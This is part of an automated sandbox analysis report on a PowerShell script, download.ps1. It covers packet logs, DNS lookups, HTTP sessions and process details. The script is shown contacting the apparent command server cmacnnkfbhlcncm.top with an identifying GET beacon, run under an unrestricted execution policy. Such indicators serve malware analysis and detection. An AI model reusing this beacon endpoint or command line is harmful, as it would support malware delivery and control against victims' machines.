                                                                                                                Dec 19, 2024 13:29:04.399017096 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.399071932 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.399147987 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.403114080 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.403167963 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.412909985 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.412966967 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.413022041 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.417007923 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.426482916 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.426553965 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.458957911 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.459091902 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.459187031 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.463174105 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.463258028 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.463319063 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.534085035 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.534216881 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.534307957 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.535562992 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.535646915 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.535695076 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.540935993 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.540976048 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.541028023 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.544783115 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.544891119 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.544948101 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.549664974 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.550010920 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.550060987 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.550107002 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.555110931 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.555212975 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.557836056 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.558007002 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.558068037 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.560915947 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.571842909 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.571877956 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.571985960 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.574079990 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.574130058 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.584322929 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.584419966 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.584481001 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:05.197166920 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:05.198101997 CET4970480192.168.2.545.61.136.138

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 19, 2024 13:29:00.172491074 CET5201453192.168.2.51.1.1.1
                                                                                                                Dec 19, 2024 13:29:00.589903116 CET53520141.1.1.1192.168.2.5
                                                                                                                Dec 19, 2024 13:29:01.999372959 CET4952153192.168.2.51.1.1.1
                                                                                                                Dec 19, 2024 13:29:02.137217999 CET53495211.1.1.1192.168.2.5

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 19, 2024 13:29:00.172491074 CET192.168.2.51.1.1.10xe735Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 13:29:01.999372959 CET192.168.2.51.1.1.10x9764Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 19, 2024 13:29:00.589903116 CET1.1.1.1192.168.2.50xe735No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 13:29:02.137217999 CET1.1.1.1192.168.2.50x9764No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • cmacnnkfbhlcncm.top
                                                                                                                • www.google.com

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.54970445.61.136.138804164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 19, 2024 13:29:00.724692106 CET216OUTGET /o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: cmacnnkfbhlcncm.top
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 19, 2024 13:29:01.997759104 CET166INHTTP/1.1 302 Found
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Thu, 19 Dec 2024 12:29:01 GMT
                                                                                                                Content-Length: 0
                                                                                                                Connection: keep-alive
                                                                                                                Location: http://www.google.com


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549705142.250.181.132804164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 19, 2024 13:29:02.285887003 CET159OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: www.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 19, 2024 13:29:04.146959066 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 12:29:03 GMT
                                                                                                                Expires: -1
                                                                                                                Cache-Control: private, max-age=0
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ZyRLHfeFz8ZbNWiHfvCzJw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Server: gws
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Set-Cookie: AEC=AZ6Zc-V_t94piQQzx2zhA0GNL4eN6yHV1hGrZHtg1zHvvpw5hYUQ9ls83Q; expires=Tue, 17-Jun-2025 12:29:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                Set-Cookie: NID=520=CSH21qqp1Et4ne3rJJqOlWIw1ZF2ftlTK-Gw2Gsgmz2JZ4f_GnVtGynYmcUMz_Ak-i_L4G3Eoypwa2lKdh1jX4Cz3SPW4Iabt9QlvnM56KDzjzyFr0FUOumzhHeMKh2G5lSdmLX6GSSajx5Qsi-pjpNbuHd9JMl66f4lrfdqbp53LmP-TItd0qsxWDkAgrs4t4yqb0okJA; expires=Fri, 20-Jun-2025 12:29:03 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Accept-Ranges: none
                                                                                                                Vary: Accept-Encoding
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Data Raw: 33 37 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
                                                                                                                Data Ascii: 3797<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                                Dec 19, 2024 13:29:04.147021055 CET1236INData Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
                                                                                                                Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/l
                                                                                                                Dec 19, 2024 13:29:04.147058964 CET1236INData Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 6a 78 46 6b 5a 2d 6e 31 4a 34 48 48 35 4f 55 50 72 59 6e 6f 75 51 51 27 2c 6b 45 58 50 49 3a 27 30 2c 33 37 30 30 32 36 33 2c 36 38 36 2c 34 33 35 2c 35 33 38 36 36 31
                                                                                                                Data Ascii: >(function(){var _g={kEI:'jxFkZ-n1J4HH5OUPrYnouQQ',kEXPI:'0,3700263,686,435,538661,2872,2891,73050,16105,201864,132771,10161,45786,9779,99404,3801,2412,50869,7734,27535,11813,1632,22865,6414,27083,5213672,584,182,5992089,2842486,238,4,23934277
                                                                                                                Dec 19, 2024 13:29:04.147152901 CET1236INData Raw: 36 31 2c 32 35 34 2c 33 32 2c 34 30 2c 37 30 2c 34 35 32 2c 32 2c 37 2c 31 2c 31 30 38 2c 33 32 2c 37 30 34 2c 39 33 2c 33 36 33 2c 35 34 2c 31 2c 38 2c 34 32 39 2c 33 34 30 2c 31 33 39 2c 33 33 39 2c 38 35 2c 31 34 36 2c 32 31 31 2c 33 33 2c 36
                                                                                                                Data Ascii: 61,254,32,40,70,452,2,7,1,108,32,704,93,363,54,1,8,429,340,139,339,85,146,211,33,633,39,1285,28,165,1,464,1402,471,1141,1287,20989465,359918,37198,18,2004,1478,868,5240,45,155,376,177,1774,8,2065,3,1207,598,12,919,5985106,2038087',kBL:'FVW1',k
                                                                                                                Dec 19, 2024 13:29:04.147186995 CET1236INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c
                                                                                                                Data Ascii: nction(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:
                                                                                                                Dec 19, 2024 13:29:04.147222996 CET1236INData Raw: 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61
                                                                                                                Data Ascii: a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#
                                                                                                                Dec 19, 2024 13:29:04.147278070 CET1236INData Raw: 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d
                                                                                                                Data Ascii: ox-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;dis
                                                                                                                Dec 19, 2024 13:29:04.147375107 CET1236INData Raw: 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70
                                                                                                                Data Ascii: px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparen
                                                                                                                Dec 19, 2024 13:29:04.147444010 CET1236INData Raw: 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67
                                                                                                                Data Ascii: 39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29p
                                                                                                                Dec 19, 2024 13:29:04.147480011 CET1236INData Raw: 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74
                                                                                                                Data Ascii: d,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline
                                                                                                                Dec 19, 2024 13:29:04.266819000 CET1236INData Raw: 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65
                                                                                                                Data Ascii: 0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:07:28:53
                                                                                                                Start date:19/12/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:07:28:54
                                                                                                                Start date:19/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF848F47AC6 Relevance: .5, Instructions: 472COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 47731f6546828ef759251406d4f41ebfd598caa1b54bedd768a7c2ebbb6e0044
                                                                                                                  • Instruction ID: e042d1236bc9d2f1d420ec11b552abd7b0101e4d5bd3c7bbee42e03d2a36b6dc
                                                                                                                  • Opcode Fuzzy Hash: 47731f6546828ef759251406d4f41ebfd598caa1b54bedd768a7c2ebbb6e0044
                                                                                                                  • Instruction Fuzzy Hash: 61F1A23091CA8D8FEBA8EF28C8557E937E1FF64750F04426AE84DC7295DF3499458B82
                                                                                                                  Function 00007FF848F48872 Relevance: .5, Instructions: 460COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: badb282a44fac5d1a04e2c40309c2717d764826215fcdfb88d5e2c0d443cd7bb
                                                                                                                  • Instruction ID: 016964f864834348ac79c087bad1c22f8895e7f6fc1ef11bd22ebd3066e1c364
                                                                                                                  • Opcode Fuzzy Hash: badb282a44fac5d1a04e2c40309c2717d764826215fcdfb88d5e2c0d443cd7bb
                                                                                                                  • Instruction Fuzzy Hash: 91E1C33091CA4E8FEBA8EF28C8557E937E1FB64750F44426AD84DC7291DB7498458B81
                                                                                                                  Function 00007FF848F3937A Relevance: .6, Instructions: 633COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ade7b56dd26732c0a7b67fa11698d22a044d899475b93c148ab01cfec033dcba
                                                                                                                  • Instruction ID: e5918e119b05a1b3d66f7f9fd5fc6cc39b307a181f97984fb9c04c63ecedad68
                                                                                                                  • Opcode Fuzzy Hash: ade7b56dd26732c0a7b67fa11698d22a044d899475b93c148ab01cfec033dcba
                                                                                                                  • Instruction Fuzzy Hash: 2712C530A1CA498FDB89EF1CC495AA97BE1FFA9350F14016ED449D7696CB35EC81CB80
                                                                                                                  Function 00007FF848F3786C Relevance: .5, Instructions: 509COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0a943f8ae4763739c2c1b4a67e1d0bea4a7c985541a42952807ff1f6930abb91
                                                                                                                  • Instruction ID: d1dc7610980b3f5d9502c0fe45da27dd84df9a90bf4e06bdef7d7d091c713a8d
                                                                                                                  • Opcode Fuzzy Hash: 0a943f8ae4763739c2c1b4a67e1d0bea4a7c985541a42952807ff1f6930abb91
                                                                                                                  • Instruction Fuzzy Hash: 25F19F30A1CA4D8FDB98EF58C495AA9BBF1FF68350F14417AD409D7296DB34E881CB80
                                                                                                                  Function 00007FF848F48486 Relevance: .3, Instructions: 334COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d6b0d06537dab1f85b2f0fbe49b62ebd58cc8453e0b7894467627c0af87a906
                                                                                                                  • Instruction ID: 34dc17d44d5ec79fc48cc4bb8c3af42a8cd3a19fba41cacf1401922d29fbc05a
                                                                                                                  • Opcode Fuzzy Hash: 9d6b0d06537dab1f85b2f0fbe49b62ebd58cc8453e0b7894467627c0af87a906
                                                                                                                  • Instruction Fuzzy Hash: 72B1D43051CA4D8FEBA8EF28C8557E93BE1FF65350F04426EE84DC7292DB3498458B86
                                                                                                                  Function 00007FF848E1E380 Relevance: .1, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188091101.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e1d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cb4fec3cbcf7df827ffa42c266f90879c31fce486c879d70d91993deaa142f55
                                                                                                                  • Instruction ID: f79673a2fb6061319342930f44cb7bfd062fd88db24babf8fc89b5769334efb4
                                                                                                                  • Opcode Fuzzy Hash: cb4fec3cbcf7df827ffa42c266f90879c31fce486c879d70d91993deaa142f55
                                                                                                                  • Instruction Fuzzy Hash: 5141167180DBC54FE79A9B2898459623FF0FF56350F1501EFE089CB1A3DB25A84AC792
                                                                                                                  Function 00007FF848F4209A Relevance: .1, Instructions: 123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 909075f6d85b33af499cff92c49bafad8a05e8c27519e1389a43a279e866a150
                                                                                                                  • Instruction ID: b102b5fc14d3ee7dc67fe858d2c35954c0d3e1eec94e76d1f83faec640dbb236
                                                                                                                  • Opcode Fuzzy Hash: 909075f6d85b33af499cff92c49bafad8a05e8c27519e1389a43a279e866a150
                                                                                                                  • Instruction Fuzzy Hash: 6E31E83191CB4C9FDB18DF5C980A6A97BE0FBA9711F00422FE449D3292DB74A855CBC6
                                                                                                                  Function 00007FF848F42928 Relevance: .1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05449a2a2ef5bfd2209585d91bdd7a20420fdeb094fe5affdc6a4b2c31dfcfd6
                                                                                                                  • Instruction ID: bbbf9033ba531172cd0c4f16804ae86219d7e0513673f15b23065d2890c93ae8
                                                                                                                  • Opcode Fuzzy Hash: 05449a2a2ef5bfd2209585d91bdd7a20420fdeb094fe5affdc6a4b2c31dfcfd6
                                                                                                                  • Instruction Fuzzy Hash: D821F63190CA4C4FDB58DFAC984A7E97BE0EBA6321F04426BD04CC3192DA74A45ACB91
                                                                                                                  Function 00007FF848F47F84 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b60755b6c2dff54ffff38f784e98fa4fc859307ff5bdfecd3ea7430ce12a4fd6
                                                                                                                  • Instruction ID: 652310cbd36c1bd7788e5d7e70e82f6a12abb7dd8aefc97ef7a50aaff3a3f2b8
                                                                                                                  • Opcode Fuzzy Hash: b60755b6c2dff54ffff38f784e98fa4fc859307ff5bdfecd3ea7430ce12a4fd6
                                                                                                                  • Instruction Fuzzy Hash: 75310A3082D68E8EFBB4AF28CC0ABF93291FF51755F40413AD84D960D2CB386945CB55
                                                                                                                  Function 00007FF848F35095 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0dce9a6340ce207246aad802030390f1a678d99f7a45e353a8751e5f457bc81a
                                                                                                                  • Instruction ID: 624ebdde8435dc957446760ba67081942c1d616c1e109ae1feb3eeeef44d78ae
